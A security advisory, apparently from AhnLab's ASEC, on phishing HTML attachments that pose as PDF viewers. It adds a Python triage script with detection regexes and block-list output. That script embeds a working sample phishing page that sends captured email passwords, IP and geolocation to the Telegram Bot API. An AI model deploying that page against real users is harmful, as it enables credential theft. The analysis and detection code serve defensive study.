AhnLab Security Emergency response Center (ASEC) has recently identified multiple phishing script files, disguised as PDF document viewer screens, being distributed as email attachments. Some of the identified file names are listed below; keywords such as purchase order (PO), order, and receipt are used to make them look like routine business documents.
New order_20230831.html
Salbo_PO_20230823.pdf.html
WoonggiOrder-230731.pdf.html
PO_BG20231608-019.html
○○○ Pharma.pdf.html
DH○_BILL_LADING_DOCUMENT_RECEIPT.html
_Purchase Order Received from ○○○ Cosmetics_msg (email)
BL_148200078498.html
En○○○ Purchase Order.html
Sung○○ BioX_New PO.pdf.html
As shown in Figure 1 below, a blurred image of the document contents is used as the background. When the attached HTML file is opened, a prompt reading “Log in with your email password to see the document” is displayed. Below the password field, a warning states that entering the wrong password may result in losing access to the file. Because the page is crafted to closely resemble a real PDF viewer, users need to be particularly careful.
The message displayed changes with the number of times the user has entered a password, which shows how carefully the file was built to deceive. The response differs when the login button is clicked with an empty password field and according to how many times (1 to 3) the button has been clicked after a value was entered. With an empty field, the message “Cannot find matching login information” is shown. On the first click after a value is entered, “Please enter the correct password” is shown; on the second, “The password you entered is incorrect”.
Notably, on the third login attempt the user is redirected to a page for downloading a public promotional PDF provided by a Korean ERP company. Because that PDF is a legitimate file available to anyone, the user is less likely to realize that the attachment was a phishing file; the redirect is purely cosmetic and does nothing to undo the exfiltration described below. Besides scripts that redirect to that site, there are also variants that redirect the user to a website hosting a normal image file with no malicious features (Figure 4).
In Figure 5, the script selects different texts to display according to the number of login attempts: #password__empty (login attempted with an empty password field), #password__incorrect (one login attempt), and #password__incorrect1 (two login attempts). The code in the red box assigns the window.location.href property to redirect the user to a URL hosting a normal PDF file once the click event has fired three times.
Messages are sent via Telegram, which requires a bot token and a chat ID. The sendTeleMsg function shown in Figure 6 sends the recipient’s email address, the password entered by the user, and the user’s IP address through the Telegram Bot API to a chat room created by the threat actor. Because the IP object is populated from a public geolocation service (json.geoiplookup.io), the attacker obtains not only the IP address but also the ISP and geographical information, including longitude and latitude (Figure 7). Since the HTML file runs locally in the victim’s browser, no attacker-hosted web server is needed: the browser itself submits the credentials to api.telegram.org. The same design means the bot token and chat ID are embedded in the client-side script, where anyone inspecting the attachment can recover them for blocking or reporting.
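The behaviour described in the last two paragraphs (password prompt, per-attempt messages, third-click redirect, Telegram exfiltration with a geolocation lookup) is exactly what a static triage script can key on. The following is an added example, not ASEC’s code or anything taken from the samples: it embeds a constructed HTML attachment that mimics the described script (every token, chat ID, address and URL in it is a made-up placeholder, not a real IOC), extracts the pivotable indicators with regular expressions, and scores them with a heuristic weighting chosen for this example.

```python
"""Static triage of an HTML e-mail attachment for the fake-PDF-viewer phishing
pattern described above. Added example, not ASEC's code: it looks for the
password prompt, the Telegram Bot API call with an embedded bot token and chat
ID, the json.geoiplookup.io lookup, and the window.location.href redirect."""
import re
import sys
from typing import Any, Dict, List

# Constructed sample that mimics the described script. The token, chat ID,
# e-mail address and URLs are made-up placeholders, not real IOCs.
FAKE_TOKEN = "1234567890:" + "A" * 35   # Telegram bot tokens are <bot id>:<35 chars>
FAKE_CHAT_ID = "-100123456789"
FAKE_REDIRECT = "https://example.com/public-brochure.pdf"

SAMPLE_HTML = """<html><body style="background:url(blurred-page.jpg)">
<form id="pdf-login">
  <input type="email" id="email" value="victim@example.com">
  <input type="password" id="password">
  <span id="password__empty" hidden>Cannot find matching login information</span>
  <span id="password__incorrect" hidden>Please enter the correct password</span>
  <span id="password__incorrect1" hidden>The password you entered is incorrect</span>
  <button id="login">Log in with your email password to see the document</button>
</form>
<script>
var count = 0, ip = {};
fetch("https://json.geoiplookup.io/").then(r => r.json()).then(d => ip = d);
function sendTeleMsg(text) {
  var token = "%s", chat_id = "%s";
  fetch("https://api.telegram.org/bot" + token + "/sendMessage?chat_id=" + chat_id
        + "&text=" + encodeURIComponent(text));
}
document.getElementById("login").onclick = function () {
  var pw = document.getElementById("password").value;
  if (pw === "") { document.getElementById("password__empty").hidden = false; return; }
  count++;
  sendTeleMsg("email:" + email.value + " pw:" + pw + " ip:" + ip.ip + " isp:" + ip.isp);
  if (count === 1) document.getElementById("password__incorrect").hidden = false;
  if (count === 2) document.getElementById("password__incorrect1").hidden = false;
  if (count >= 3) window.location.href = "%s";
};
</script></body></html>""" % (FAKE_TOKEN, FAKE_CHAT_ID, FAKE_REDIRECT)

# Telegram bot tokens: numeric bot id, colon, 35-character secret.
TOKEN_RE = re.compile(r"(?<![A-Za-z0-9_-])(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# chat_id assigned or passed as a literal (negative ids are groups/channels).
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*[\"']?(-?\d{5,})")
# Client-side redirect target, the "benign PDF" decoy in this campaign.
REDIRECT_RE = re.compile(r"window\.location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']")
PASSWORD_FIELD_RE = re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.IGNORECASE)


def triage(html: str) -> Dict[str, Any]:
    """Extract pivotable indicators from one HTML attachment and score them."""
    findings: Dict[str, Any] = {
        "password_field": bool(PASSWORD_FIELD_RE.search(html)),
        "telegram_api": "api.telegram.org" in html,
        "telegram_tokens": sorted(set(TOKEN_RE.findall(html))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(html))),
        "geoip_lookup": "json.geoiplookup.io" in html,
        "redirects": sorted(set(REDIRECT_RE.findall(html))),
    }
    # Weighting is a heuristic chosen for this example: an exfiltration channel
    # weighs most; the decoy redirect and geolocation are supporting evidence.
    score = 0
    score += 1 if findings["password_field"] else 0
    score += 3 if findings["telegram_api"] or findings["telegram_tokens"] else 0
    score += 1 if findings["geoip_lookup"] else 0
    score += 1 if findings["redirects"] else 0
    if score >= 4 and findings["password_field"]:
        verdict = "likely credential phishing (Telegram exfil)"
    elif score >= 2:
        verdict = "suspicious"
    else:
        verdict = "no indicators"
    findings["score"] = score
    findings["verdict"] = verdict
    return findings


def block_list(findings: Dict[str, Any]) -> List[str]:
    """URLs worth blocking or reporting: the bot endpoint and the decoy redirect."""
    urls = [f"https://api.telegram.org/bot{t}/" for t in findings["telegram_tokens"]]
    urls.extend(findings["redirects"])
    return urls


if __name__ == "__main__":
    # Usage: python triage.py attachment.html   (falls back to the built-in sample)
    html = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HTML
    result = triage(html)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("block/report:", block_list(result))
```

The token regex is the useful part: because the secret sits in client-side script, it is recoverable from the attachment itself, and the same token can be reported to Telegram or queried against the documented `getMe` method of the Bot API to confirm the bot is still live before deciding on a takedown request. The numeric thresholds are illustrative and should be tuned against a corpus of known-good HTML attachments before being used to auto-quarantine mail.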
The threat actor is believed to use Telegram for these phishing attacks because of its reputation for anonymity and encryption. Routing the stolen data through the API of a legitimate application is also likely an attempt to evade antivirus and URL filtering: an attacker-controlled domain can simply be blocked once it is identified as malicious, whereas a widely used legitimate domain is much harder to block outright. There have been past cases as well where the Telegram API was used to steal user account credentials. The recent cases are notable in that the elements are more carefully crafted to deceive users, including the use of normal, publicly available websites in the code. Users should not enter account credentials into attachments received in emails from unknown sources.
[File Detection]
Phishing/HTML.SendTelegram.S2342 (2023.08.21.02)
Phishing/HTML.SendTelegram.S2346 (2023.08.30.03)
Phishing/HTML.Generic.SC192009 (2023.09.01.00 and multiple others)
[IOC]
94ebd0b12c95f5072561676985b1dbe5
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/56812/